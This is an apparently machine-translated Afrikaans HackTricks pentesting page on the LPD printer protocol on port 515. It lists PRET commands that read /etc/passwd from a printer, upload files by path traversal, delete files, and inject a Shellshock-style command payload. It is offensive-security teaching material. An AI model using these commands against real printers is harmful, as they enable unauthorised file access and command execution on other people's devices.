hacktricks/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md

4 KiB

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks
{% endhint %}

Inleiding tot LPD Protokol

In die 1980's is die Line Printer Daemon (LPD) protokol ontwikkel in Berkeley Unix, wat later deur RFC1179 geformaliseer is. Hierdie protokol werk oor poort 515/tcp, wat interaksies deur die lpr opdrag moontlik maak. Die essensie van druk via LPD behels die stuur van 'n beheerlêer (om werksbesonderhede en gebruiker te spesifiseer) saam met 'n data lêer (wat die drukinligting bevat). Terwyl die beheerlêer die keuse van verskeie lêerformate vir die datalêer toelaat, word die hantering van hierdie lêers bepaal deur die spesifieke LPD implementering. 'n Algemeen erkende implementering vir Unix-agtige stelsels is LPRng. Opmerklik is dat die LPD protokol uitgebuit kan word om kwaadwillige PostScript of PJL drukwerk uit te voer.

Gereedskap vir Interaksie met LPD Drukkers

PRET stel twee noodsaaklike gereedskap bekend, lpdprint en lpdtest, wat 'n eenvoudige metode bied om met LPD-ondersteunde drukkers te kommunikeer. Hierdie gereedskap stel 'n reeks aksies in staat, van die druk van data tot die manipulasie van lêers op die drukker, soos aflaai, oplaai of verwyder:

# To print a file to an LPD printer
lpdprint.py hostname filename
# To get a file from the printer
lpdtest.py hostname get /etc/passwd
# To upload a file to the printer
lpdtest.py hostname put ../../etc/passwd
# To remove a file from the printer
lpdtest.py hostname rm /some/file/on/printer
# To execute a command injection on the printer
lpdtest.py hostname in '() {:;}; ping -c1 1.2.3.4'
# To send a mail through the printer
lpdtest.py hostname mail lpdtest@mailhost.local

Vir individue wat belangstel om die wêreld van printer hacking verder te verken, kan 'n omvattende hulpbron hier gevind word: Hacking Printers.

Shodan

  • port 515

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks
{% endhint %}